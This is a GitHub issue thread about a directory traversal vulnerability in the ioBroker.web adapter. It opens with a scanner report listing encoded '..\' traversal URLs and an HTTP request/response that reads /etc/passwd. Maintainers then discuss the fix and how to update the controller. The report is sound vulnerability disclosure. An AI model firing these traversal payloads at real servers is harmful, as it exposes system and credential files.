### ISSUE TITLE
Generic HTTP Directory Traversal

### ISSUE THREAD

**Issue by Net-Felix** [ioBroker/ioBroker.web#12]
Hi, i did a scan of my network and found the following:

The following traversal URL(s) where found:

```
Vulnerable urls:
http://192.168.2.125:8082/..\..\..\..\..\..\etc/passwd
http://192.168.2.125:8082/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cetc/passwd
http://192.168.2.125:8082/%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\etc/passwd
http://192.168.2.125:8082/..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd


Request:
GET /..\..\..\..\..\..\etc/passwd HTTP/1.1 
Connection: Close 
Host: 192.168.2.125:8082 
Pragma: no-cache 
Cache-Control: no-cache 
User-Agent: Mozilla/5.0 [en] (X11, U; OpenVAS 9.0.1) 
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* 
Accept-Language: en 
Accept-Charset: iso-8859-1,*,utf-8 
 

Response:
HTTP/1.1 200 OK 
Content-Type: text/javascript; charset=utf-8 
Content-Length: 1650 
ETag: W/"672-znRgmc9sOgkYYXtm2Nb/wTozm3M" 
Date: Thu, 14 Jun 2018 09:21:02 GMT 
Connection: close 
 
 
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
.
.
.
```

**Comment by Apollon77** [comment]
Which web version you use? Plese upfdate to lastest because this should be already solved.

Current is 2.3.5

**Comment by Net-Felix** [comment]
Hi,

my installed Version is already 2.3.5

**Comment by Apollon77** [comment]
which js-controller Version

**Comment by Net-Felix** [comment]
Controller "js-controller" : 1.4.2    , installed 1.4.2

**Comment by Apollon77** [comment]
please try 1.5.0 from Github ... was fixed 2 days after 1.4.2 release: https://github.com/ioBroker/ioBroker.web/issues/9

**Comment by Net-Felix** [comment]
cant figure out how to update js-controller from git :-(

**Comment by GermanBluefox** [comment]
cd /opt/iobroker
iobroker stop
npm i https://github.com/iobroker/iobroker.js-controller/master/tarball --production
iobroker start

**Comment by Net-Felix** [comment]
i get the following error:

npm ERR! fetch failed https://github.com/iobroker/iobroker.js-controller/master/tarball
npm WARN retry will retry, error on last attempt: Error: fetch failed with status code 404
npm ERR! fetch failed https://github.com/iobroker/iobroker.js-controller/master/tarball
npm WARN retry will retry, error on last attempt: Error: fetch failed with status code 404
npm ERR! fetch failed https://github.com/iobroker/iobroker.js-controller/master/tarball
npm ERR! Linux 4.9.0-6-amd64
npm ERR! argv "/usr/bin/node" "/usr/bin/npm" "i" "https://github.com/iobroker/iobroker.js-controller/master/tarball" "--production"
npm ERR! node v6.14.3
npm ERR! npm  v3.10.10

npm ERR! fetch failed with status code 404
npm ERR!
npm ERR! If you need help, you may report this error at:
npm ERR!     <https://github.com/npm/npm/issues>

npm ERR! Please include the following file with any support request:
npm ERR!     /opt/npm-debug.log

[npm-debug.log](https://github.com/ioBroker/ioBroker.web/files/2141756/npm-debug.log)

**Comment by Apollon77** [comment]
Repo name is ioBroker/ioBroker.js-Controller (case sensitive :-) )

**Comment by GermanBluefox** [comment]
https://github.com/ioBroker/ioBroker.web/commit/3718ad86f92c3408f80fe6e96119233fc4d07c2a#diff-7a9076d6d94e62c13d641aa71f19ae8eR780

**Comment by GermanBluefox** [comment]
>but it doesn't run stable, it always resets and restarts, i'll wait for official release then

Can you provide logs of restarts?

**Comment by Net-Felix** [comment]
sure,

[restart.log](https://github.com/ioBroker/ioBroker.web/files/2142572/restart.log)
[iobroker.2018-06-27.log](https://github.com/ioBroker/ioBroker.web/files/2142573/iobroker.2018-06-27.log)
